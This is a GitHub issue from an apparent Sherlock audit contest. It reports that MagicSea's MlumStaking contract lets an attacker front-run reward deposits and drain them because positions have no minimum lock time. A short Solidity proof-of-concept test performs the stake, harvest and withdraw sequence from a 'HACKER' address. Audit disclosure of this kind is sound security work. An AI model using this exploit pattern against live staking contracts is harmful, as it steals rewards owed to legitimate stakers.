Skip to content
This repository has been archived by the owner on Jan 12, 2025. It is now read-only.

sh0velware - MlumStaking rewards can be drained #274

Closed
sherlock-admin3 opened this issue Jul 15, 2024 · 0 comments
Closed

sh0velware - MlumStaking rewards can be drained #274

sherlock-admin3 opened this issue Jul 15, 2024 · 0 comments
Labels
Duplicate A valid issue that is a duplicate of an issue with `Has Duplicates` label Medium A Medium severity issue. Reward A payout will be made for this issue

Comments

@sherlock-admin3
Copy link
Contributor

sherlock-admin3 commented Jul 15, 2024
edited by sherlock-admin4
Loading

sh0velware

High

MlumStaking rewards can be drained

Summary

Since there is no minimum staking time, the reward mechanism can be gamed to drain the rewards from the contract as soon as they are added.

Vulnerability Detail

Any added reward can be drained as soon as they are added to the contract, given that there is no minimum lock time. Because of this, any attacker could easily front-run the reward transfer to create a position with a significant amount of tokens locked, harvest the rewards and then withdraw the tokens from the pool.

Impact

The described behavior will allow any user to drain the rewards, stealing them from the legitimate user's portion.

Code Snippet

https://github.com/sherlock-audit/2024-06-magicsea/blob/main/magicsea-staking/src/MlumStaking.sol#L677-L678

Tool used

Manual Review

PoC:

    function drainRewards() public{ 
        _stakingToken.mint(ALICE, 1 ether);
        _stakingToken.mint(BOB, 1 ether);
        _stakingToken.mint(HACKER, 1000 ether); 

        vm.startPrank(ALICE);
        _stakingToken.approve(address(_pool), 1 ether);
        _pool.createPosition(1 ether, 365 days);
        
        vm.startPrank(BOB);
        _stakingToken.approve(address(_pool), 1 ether);
        _pool.createPosition(1 ether, 365 days);

        vm.startPrank(HACKER); 
        _stakingToken.approve(address(_pool), 1000 ether);
        _pool.createPosition(1000 ether, 0);
        vm.stopPrank();

        _rewardToken.mint(address(_pool), 100_000_000); //Adding rewards

        vm.startPrank(HACKER);
        _pool.harvestPosition(3);
        _pool.withdrawFromPosition(3, 1000 ether);
    }

Recommendation

A minimum locking time should be defined, so the positions are eligible to claim rewards.

Duplicate of #74
@github-actions github-actions bot added the Excluded Excluded by the judge without consulting the protocol or the senior label Jul 21, 2024
@0xSmartContract 0xSmartContract added Medium A Medium severity issue. Duplicate A valid issue that is a duplicate of an issue with `Has Duplicates` label and removed Excluded Excluded by the judge without consulting the protocol or the senior labels Jul 27, 2024
@sherlock-admin4 sherlock-admin4 changed the title Huge Banana Swan - MlumStaking rewards can be drained sh0velware - MlumStaking rewards can be drained Jul 29, 2024
@sherlock-admin4 sherlock-admin4 added the Reward A payout will be made for this issue label Jul 29, 2024
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Assignees
No one assigned
Labels
Duplicate A valid issue that is a duplicate of an issue with `Has Duplicates` label Medium A Medium severity issue. Reward A payout will be made for this issue
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
3 participants
@0xSmartContract @sherlock-admin3 @sherlock-admin4